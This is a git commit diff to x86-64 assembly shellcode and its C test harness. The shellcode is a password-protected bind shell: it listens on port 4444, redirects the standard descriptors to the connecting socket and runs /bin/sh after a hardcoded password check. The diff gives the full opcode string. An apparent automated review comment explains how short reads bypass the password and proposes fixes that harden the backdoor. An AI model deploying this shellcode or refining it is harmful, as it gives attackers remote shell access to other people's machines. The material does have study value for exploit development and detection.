Commit 561da605 authored by André Lima

improvements

parent 8f516783
global _start
_start:
; sock = socket(AF_INET, SOCK_STREAM, 0)
......@@ -8,140 +7,107 @@ _start:
; SOCK_STREAM = 1
; syscall number 41
xor rax,rax
mov al,41
mov rax, 41
mov rdi, 2
mov rsi, 1
mov rdx, 0
push 41
pop rax
push 2
pop rdi
push 1
pop rsi
cdq
syscall
; copy socket descriptor to rdi for future use
mov rdi, rax
xchg rdi,rax
; server.sin_family = AF_INET
; server.sin_port = htons(PORT)
; server.sin_addr.s_addr = INADDR_ANY
; bzero(&server.sin_zero, 8)
xor rax, rax
push rax
mov dword [rsp-4], eax
mov word [rsp-6], 0x5c11
mov word [rsp-8], 0x2
sub rsp, 8
push rdx
mov dx,0x5c11
shl rdx,16
xor dl,0x2
push rdx
; bind(sock, (struct sockaddr *)&server, sockaddr_len)
; syscall number 49
mov rax, 49
mov rsi, rsp
mov rdx, 16
mov al,49
push 16
pop rdx
syscall
; listen(sock, MAX_CLIENTS)
; syscall number 50
mov rax, 50
mov rsi, 2
push 50
pop rax
push 2
pop rsi
syscall
; new = accept(sock, (struct sockaddr *)&client, &sockaddr_len)
; syscall number 43
mov rax, 43
sub rsp, 16
mov rsi, rsp
mov byte [rsp-1], 16
sub rsp, 1
mov rdx, rsp
syscall
; store the client socket description
mov r9, rax
; close parent
mov rax, 3
syscall
; duplicate sockets
; dup2 (new, old)
mov rdi, r9
mov rax, 33
mov rsi, 0
syscall
mov rax, 33
mov rsi, 1
syscall
mov rax, 33
mov rsi, 2
syscall
; execve
; First NULL push
xor rax, rax
push rax
; push /bin//sh in reverse
mov rbx, 0x68732f2f6e69622f
push rbx
; store /bin//sh address in RDI
mov rdi, rsp
; Second NULL push
push rax
; set RDX
mov rdx, rsp
; Push address of /bin//sh
push rdi
; set RSI
mov rsi, rsp
; Call the Execve syscall
add rax, 59
syscall
mov al,43
sub rsp,16
mov rsi,rsp
push 16
mov rdx,rsp
syscall
; close parent
;push 3
;pop rax
;syscall
; duplicate sockets
; dup2 (new, old)
xchg rdi,rax
push 3
pop rsi
dup2cycle:
mov al, 33
dec esi
syscall
loopnz dup2cycle
; read passcode
; xor rax,rax - already zeroed from prev cycle
xor rdi,rdi
push rax
mov rsi,rsp
push 8
pop rdx
syscall
; Authentication with password "1234567"
xchg rcx,rax
mov rbx,0x0a37363534333231
push rbx
mov rdi,rsp
repe cmpsb
jnz wrong_pwd
; execve stack-method
push 59
pop rax
cdq ; extends rax sign into rdx, zeroing it out
push rdx
mov rbx,0x68732f6e69622f2f
push rbx
mov rdi,rsp
push rdx
mov rdx,rsp
push rdi
mov rsi,rsp
syscall
wrong_pwd:
nop
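Review bot: The password check compares only as many bytes as read() returned, because `xchg rcx,rax` turns the read count into the `repe cmpsb` length: any correct prefix of "1234567\n", even a lone "1", authenticates, and a zero-length read (client half-closes) leaves rcx=0, skips the compare entirely and falls through on the stale ZF left by `xor rdi,rdi`, so it also reaches execve. Fix the compare length to the password's 8 bytes so a short, empty or failed read mismatches against the buffer the `push rax` zero-filled: replace `xchg rcx,rax` with `push 8` / `pop rcx`. Separately, the `wrong_pwd:` path ends at `nop` and execution runs off the end of the shellcode into whatever follows in memory; an exit there (`push 60` / `pop rax` / `syscall`) or a jump back to the accept would be safer. `loopnz dup2cycle` also depends on rcx being non-zero after `syscall` (it holds the return RIP), which holds here but is non-obvious enough to deserve a comment such as `; rcx is the post-syscall return RIP (never 0); loopnz terminates on ZF from dec esi`.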
......@@ -2,8 +2,7 @@
#include<string.h>
unsigned char code[] = \
"\x48\xb8\x29\x00\x00\x00\x00\x00\x00\x00\x48\xbf\x02\x00\x00\x00\x00\x00\x00\x00\x48\xbe\x01\x00\x00\x00\x00\x00\x00\x00\x48\xba\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x05\x48\x89\xc7\x48\x31\xc0\x50\x89\x44\x24\xfc\x66\xc7\x44\x24\xfa\x11\x5c\x66\xc7\x44\x24\xf8\x02\x00\x48\x83\xec\x08\x48\xb8\x31\x00\x00\x00\x00\x00\x00\x00\x48\x89\xe6\x48\xba\x10\x00\x00\x00\x00\x00\x00\x00\x0f\x05\x48\xb8\x32\x00\x00\x00\x00\x00\x00\x00\x48\xbe\x02\x00\x00\x00\x00\x00\x00\x00\x0f\x05\x48\xb8\x2b\x00\x00\x00\x00\x00\x00\x00\x48\x83\xec\x10\x48\x89\xe6\xc6\x44\x24\xff\x10\x48\x83\xec\x01\x48\x89\xe2\x0f\x05\x49\x89\xc1\x48\xb8\x03\x00\x00\x00\x00\x00\x00\x00\x0f\x05\x4c\x89\xcf\x48\xb8\x21\x00\x00\x00\x00\x00\x00\x00\x48\xbe\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x05\x48\xb8\x21\x00\x00\x00\x00\x00\x00\x00\x48\xbe\x01\x00\x00\x00\x00\x00\x00\x00\x0f\x05\x48\xb8\x21\x00\x00\x00\x00\x00\x00\x00\x48\xbe\x02\x00\x00\x00\x00\x00\x00\x00\x0f\x05\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\x50\x48\x89\xe2\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05";
"\x6a\x29\x58\x6a\x02\x5f\x6a\x01\x5e\x99\x0f\x05\x48\x97\x52\x66\xba\x11\x5c\x48\xc1\xe2\x10\x80\xf2\x02\x52\x48\x89\xe6\xb0\x31\x6a\x10\x5a\x0f\x05\x6a\x32\x58\x6a\x02\x5e\x0f\x05\xb0\x2b\x48\x83\xec\x10\x48\x89\xe6\x6a\x10\x48\x89\xe2\x0f\x05\x48\x97\x6a\x03\x5e\xb0\x21\xff\xce\x0f\x05\xe0\xf8\x48\x31\xff\x50\x48\x89\xe6\x6a\x08\x5a\x0f\x05\x48\x91\x48\xbb\x31\x32\x33\x34\x35\x36\x37\x0a\x53\x48\x89\xe7\xf3\xa6\x75\x1d\x6a\x3b\x58\x99\x52\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x48\x89\xe7\x52\x48\x89\xe2\x57\x48\x89\xe6\x0f\x05\x90";
main()
{
......